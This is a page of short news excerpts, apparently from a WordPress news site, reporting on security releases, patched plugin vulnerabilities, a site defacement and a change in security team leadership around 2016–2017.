Aaron D. Campbell, WordPress Core Contributor at GoDaddy, is replacing Nikolay Bachiyski as WordPress’ Security Czar or WordPress Core Security Team Lead. The role was created in 2015 to provide more structure and focus around incident responses. “The responsibilities of the position include, organizing the security team and making sure all security concerns and reports…
WordPress 4.7.1 is available for download and fixes eight security issues that affect WordPress 4.7 and below. The PHPMailer library was updated to patch a remote code execution (RCE) vulnerability. WordFence reported the vulnerability last month as critical and that it affects WordPress core. However, in the announcement post for 4.7.1, Aaron Campbell, WordPress’ new…
The BuddyPress development team has released BuddyPress 2.7.4 to address a security vulnerability that affects all versions back to 2.0. According to John James Jacoby, lead developer of BuddyPress, “This version patches a vulnerability to the BuddyPress core attachments API that could allow arbitrary file deletion on certain installation configurations.” The vulnerability was responsibly disclosed by…
In this episode of WordPress Weekly, Marcus Couch and I are joined by Tony Perez, co-founder and CEO of Sucuri. It’s easy to tell from this episode that Perez is extremely passionate about web security. We discussed a wide range of topics related to security including, trends involving WordPress, the FUD factor, messaging surrounding HTTPS,…
Over the weekend, the WP eCommerce team released version 3.11.4 of its e-commerce plugin. The update patches an SQL injection vulnerability that was responsibly disclosed by Mika Epstein, a member of the WordPress.org plugin review team. According to Justin Sainton, lead developer of WP eCommerce, the team was notified of the vulnerability on November 11th and patched within…
WP Media is reporting a high risk XSS vulnerability in W3 Total Cache that the company learned about from El Rincón de Zerial’s security blog. The plugin is currently active on more than one million WordPress sites. This particular vulnerability is found within the plugin’s support form that is embedded in the admin, according to…
When ManageWP allowed users to perform security scans of websites through the Orion interface in December of 2015, a feature commonly requested by customers was the ability to automate the scans. Nine months after implementing security checks for customers, ManageWP has added automated security scans to its assortment of features. The automated security scans are a premium feature…
WordPress 4.6.1 is available and users are strongly encouraged to update immediately as it patches two security vulnerabilities. The first is a cross-site scripting vulnerability related to image filenames that was reported by Cengiz Han Sahin, a SumOfPwn researcher. The second is a path traversal vulnerability in the upgrade package uploader reported by Dominik Schilling,…
Jetpack 4.2 is a combination release with performance improvements and fixes for a couple of security vulnerabilities. These updates secure Contact Form submission exports from potential formula injections and fix a general XSS vulnerability in the misuse of the add_query_arg() function. The majority of enhancements in this release are centered on speeding up communication between…
TechCrunch is the latest victim in OurMine’s summer hacking rampage. The site, which is powered by WordPress and hosted via WordPress.com VIP, was hacked this morning and defaced with a message from the attackers who identify themselves as an “elite hacker group.” TechCrunch’s news ticker was updated to display: “Hello guys it’s OurMine Team, we…
WP Engine customers on legacy Xen Linode host servers are being notified via email and the company’s status blog about impending downtime between July 21st and July 25th. According to an email forwarded to the Tavern from a WP Engine customer, Linode’s legacy Xen host servers contain a critical security vulnerability. We are contacting you today…
Summer of Pwnage, a Dutch community program for anyone interested in software security, is focusing on WordPress for its current open source security bug hunting event. The community program hosts meetups and workshops on the weekend where anyone from “enthusiastic beginners to the 1337est hackers” is welcome to share findings and demonstrate skills and exploits.…
John James Jacoby, lead developer of bbPress, has released bbPress 2.5.10 to patch a security vulnerability in all previous versions of the 2.X branch. This release also contains security hardening improvements where user display names and avatars are commonly displayed together. Jacoby notes that these changes affect bbPress only and don’t impact third-party themes or modifications to the…
Semper Fi Web Design, the company behind All in One SEO, a popular WordPress SEO optimization plugin that’s active on more than 1M sites, has released 2.3.7 to patch a persistent XSS security vulnerability. According to the plugin’s changelog, 2.3.7 sanitizes the Bad Bots module referer and user agent. While it doesn’t sound significant on the surface, this…
WordPress 4.5.3 was released today to fix seven important security issues that affect 4.5.2 and prior versions. Automatic background updates are already rolling out and all users are advised to update immediately. The release patches the following security issues: Redirect bypass in the customizer (reported by Yassine Aboukir) Two different XSS problems via attachment names…